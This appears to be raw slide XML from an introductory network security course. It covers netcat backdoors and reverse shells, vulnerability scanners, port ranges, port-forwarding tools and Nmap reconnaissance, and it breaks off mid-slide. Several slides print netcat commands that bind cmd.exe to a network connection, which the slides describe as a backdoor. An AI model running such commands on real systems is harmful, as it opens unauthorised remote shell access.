              <a:rPr lang="en-US"/>
              <a:t>At client: nc 127.0.0.1 1234</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  –e is being used to execute the action after the connection is being </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  established.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>In Linux, these backdoors can be made persistent which means </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   even after the current user logged out, the backdoor will keep </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   running in background.</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Reverse Shells</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can also be used to push a client session from the client to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   the server. This technique is called a reverse shell and can be </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   achieved with following commands </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At listener: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –l –p 1234 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At client: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 127.0.0.1 1234 –e cmd.exe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Benefits of Vulnerability Scanners </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Allows early detection and handling of known security problems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A  new  device  or  even  a  new  system  may  be  connected  to  the network  without  authorization.A  vulnerabilityscanner  can  help identify rogue machines, which might endanger overall system and network security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Vulnerability   scanner   allows   early detection   and   handling   of known security    problems.    By    employing    ongoing    security assessments  using  vulnerability  scanners,  it  is  easy  to  identify security vulnerabilities that may be present in the network.</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Obtain Remote Access to a Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To get command prompt of a Windows system from anywhere in </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   the world, the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command can be run on that </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   particular Windows system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -l -e cmd.exe 10.0.1.2 4455</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The above </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> example has opened a listener (-l) that will execute </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   (-e) the cmd.exe command and attach the command prompt </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   input/output to any connection on port 4455.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can behave like a system backdoor on the Windows system.</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UNDERSTANDING PORT AND SERVICES TOOLS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>For a packet to reach its destination, it must have an IP address </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   and a port.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>TCP assigns 16-bit port numbers for connections. (ports 0 through </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   65535).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Well-known ports (port 0 to 1023):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>1. The Well Known Ports are controlled and assigned by the </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>     Internet Assigned Numbers Authority (IANA).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>2. Well-known services like e-mail and the Web have predefined </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>     destination port numbers; e-mail uses port 25 (SMTP), and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>     the Web uses 80 (HTTP) and 443 (HTTPS).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US"/>
              <a:t>3. This doesn’t mean web services must always listen on port </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>     80. Having default port gives clients a better chance of </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>     discovering services and makes network administration </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>     easier.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> 4. For example, network administrators can more easily create </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>     security rules and monitor expected traffic if a service always </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>     uses a predictable port.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  Registered ports (port 1024 to 49151): </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  The port range of 1024 through 49151 is referred to as the group </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>     of registered ports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Dynamic ports (port49151 to 65535):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The range from 49152 through 65535 contains the dynamic, or </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   ephemeral, ports.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Port forwarding or redirecting tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A port redirection tool works by receiving data on one IP/port </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   combination and forwarding the data to another IP/port </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   combination.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>It works as an intermediary between the original client and the </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   destination. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Port redirection is most useful for bypassing network access </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   controls (eg: bypassing firewalls) or crossing network boundaries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Fpipe, DataPipe and WinRelay are three free and simple tools </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   designed to do simple port-forwarding.</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Datapipe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Datapipe is a Unix-based port redirection tool. The original version </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   was written by Todd Vierling in 1995.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Datapipe forwards traffic between TCP ports only.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> It passes TCP/IP traffic received by the tool on one port to another </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    port to which the tool points.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It functions as a channel for TCP/IP connections, not an end </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   point.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Aside from holding IP addresses and port number, port redirection is protocol ignorant. It doesn't care whether you pass encrypted SSH traffic or plain text.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Datapipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> does not perform protocol conversion or any other data </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   manipulation.</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Fpipe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>It is provided by McAfee.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> It implements port redirection technique natively in windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The fpipe adds more capability than datapipe. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>It also adds UDP support, which Datapipe lacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Fpipe does not require any support DLLs (Dynamic-link library) or </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   privileged user access.</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It runs on all Windows platforms.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The lack of support DLLs makes it easy to pick up fpipe.exe and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   drop it onto a system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Example: C:\&gt; fpipe -l 9080 -r 80 www.google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   -l The listening port number.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   -r The remote port number (the port to which traffic is redirected).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Datapipe’s options are few whereas FPipe’s increased functionality </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   necessitates some more command-line switches:</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NETWORK RECONNAISSANCE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Network reconnaissance is a testing done for finding potential </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   vulnerabilities in a computer network. It is the process of </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>acquiring information about a network or doing a preliminary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   survey to gain information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hackers use reconnaissance as the first step in an effective attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hackers find as much information about the target as possible </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   before launching the first attack.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Limitations of Vulnerability Scanners</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Vulnerability  scanner  can  only  assess  a  "snapshot  of  time"  in terms of a system or network's security status. Therefore, scanning needs   to   be   conducted   regularly,   as   new   vulnerabilities   can emerge,   or   system   configuration   changes   can   introduce   new security holes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Vulnerability scanner is designed to discover known vulnerabilities only.  It  cannot  identify  other  security  threats,  such  as  those related to physical, operational or procedural issues.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Generally, goals of reconnaissance on a target network are to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   discover: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  1. Locate the network and identify IP addresses of hosts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  2. Find out accessible UDP and TCP ports.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  3. Identify open ports and underlying applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  4. Identify OS type in each hosts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  5. Identify active machines.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  6. Network mapping.</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Nmap and THC-Amap are examples of tools designed to do </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Network Reconnaissance.</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Nmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Network Mapper or Nmap is a free and open-source network </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   scanner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Nmap started as a Linux utility and was ported to other systems </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   including Windows, macOS etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Nmap is used to discover hosts and services on a computer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    network by sending packets and analyzing the responses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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Nmap - Typical Features</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  1. Identify Hosts on the Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  2. Scan for TCP and UDP Ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  3. Port scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  4. Scan for Protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  5. Identify a Target’s Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  6. Scriptable interaction with the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  7. Version detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  8. Camouflage the Scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  9. Nmap can provide further information on targets, device types, and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  MAC addresses.</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Identify Hosts on the Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>To determine which hosts (i.e., IP addresses) on a network are live,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   use the Ping scanning method. It sends ICMP echo requests to the </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   specified range of IP addresses and awaits a response. Based on </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   the response, information about the network can be retrieved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Nmap applies the ICMP probing concepts to TCP ports as well. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    For example, by sending SYN, ACK packets to a TCP port nmap </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    can assume whether a host is live or not based on the response </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
